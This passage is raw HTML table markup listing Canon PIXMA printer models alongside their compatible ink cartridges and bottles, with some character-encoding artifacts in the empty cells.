width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6870</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2570S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2577S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MG3570</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG3670</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG7570</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP160</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP170</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP180</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP228</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP237</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP245</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP258</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP276</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP287</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP460</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP476</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP486</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP496</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP497</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP500</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP520</p></td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP530</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP568</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP600</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP610</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP628</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP638</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP648</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800R</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP810</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP830</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP970</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP988</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP996</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MX308</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX328</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX338</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX347</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX366</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX426</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX876</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX886</p></td><td width=\"208\"><p>CLI-726 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-725 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-1</p></td><td width=\"208\"><p>PGI-29 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Dark Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Yellow)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-10</p></td><td width=\"208\"><p>PGI-72 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-100</p></td><td width=\"208\"><p>CLI-42 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA TR8570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA 